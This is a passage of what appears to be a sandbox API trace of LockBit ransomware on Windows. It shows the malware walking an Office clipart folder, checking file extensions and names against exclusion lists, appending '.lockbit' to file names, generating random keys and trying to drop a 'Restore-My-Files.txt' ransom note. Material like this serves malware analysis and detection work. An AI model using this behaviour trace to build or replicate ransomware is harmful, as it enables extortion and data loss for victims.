(lpString1=".adv", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.318] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.319] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.319] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0102762.WMF") returned 1 [0138.320] lstrcmpiW (lpString1="ntldr", lpString2="J0102762.WMF") returned 1 [0138.320] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0102762.WMF") returned 1 [0138.320] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0102762.WMF") returned -1 [0138.320] lstrcmpiW (lpString1="autorun.inf", lpString2="J0102762.WMF") returned -1 [0138.320] lstrcmpiW (lpString1="thumbs.db", lpString2="J0102762.WMF") returned 1 [0138.320] lstrcmpiW (lpString1="iconcache.db", lpString2="J0102762.WMF") returned -1 [0138.320] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.320] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF") returned=".WMF" [0138.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.320] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.320] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.321] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.321] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF.lockbit") returned 72 [0138.321] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.322] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.322] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.322] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11216) returned 1 [0138.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.323] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.326] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.326] malloc (_Size=0xa6) returned 0x77d7a8 [0138.326] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.327] free (_Block=0x77d7a8) [0138.327] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.327] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.327] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4290, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0102984.WMF", cAlternateFileName="")) returned 1 [0138.327] lstrcmpiW (lpString1=".", lpString2="J0102984.WMF") returned -1 [0138.327] lstrcmpiW (lpString1="..", lpString2="J0102984.WMF") returned -1 [0138.327] PathFindExtensionW (pszPath="J0102984.WMF") returned=".WMF" [0138.327] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.327] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.327] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.328] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.328] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.329] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0102984.WMF") returned 1 [0138.329] lstrcmpiW (lpString1="ntldr", lpString2="J0102984.WMF") returned 1 [0138.329] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0102984.WMF") returned 1 [0138.329] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0102984.WMF") returned -1 [0138.329] lstrcmpiW (lpString1="autorun.inf", lpString2="J0102984.WMF") returned -1 [0138.329] lstrcmpiW (lpString1="thumbs.db", lpString2="J0102984.WMF") returned 1 [0138.329] lstrcmpiW (lpString1="iconcache.db", lpString2="J0102984.WMF") returned -1 [0138.329] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.329] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned=".WMF" [0138.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.330] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.330] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.330] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF.lockbit") returned 72 [0138.331] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.331] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.331] malloc (_Size=0x40068) returned 0x3d70450 [0138.331] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=17040) returned 1 [0138.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.332] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.332] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.332] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.332] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.335] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.335] malloc (_Size=0xa6) returned 0x77d7a8 [0138.336] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.336] free (_Block=0x77d7a8) [0138.336] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.336] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.336] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.336] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x43c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0103058.WMF", cAlternateFileName="")) returned 1 [0138.336] lstrcmpiW (lpString1=".", lpString2="J0103058.WMF") returned -1 [0138.336] lstrcmpiW (lpString1="..", lpString2="J0103058.WMF") returned -1 [0138.336] PathFindExtensionW (pszPath="J0103058.WMF") returned=".WMF" [0138.336] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.337] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.337] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.338] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0103058.WMF") returned 1 [0138.338] lstrcmpiW (lpString1="ntldr", lpString2="J0103058.WMF") returned 1 [0138.338] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0103058.WMF") returned 1 [0138.338] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0103058.WMF") returned -1 [0138.338] lstrcmpiW (lpString1="autorun.inf", lpString2="J0103058.WMF") returned -1 [0138.338] lstrcmpiW (lpString1="thumbs.db", lpString2="J0103058.WMF") returned 1 [0138.338] lstrcmpiW (lpString1="iconcache.db", lpString2="J0103058.WMF") returned -1 [0138.338] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.338] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF") returned=".WMF" [0138.339] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.339] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.339] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.340] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF.lockbit") returned 72 [0138.340] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, 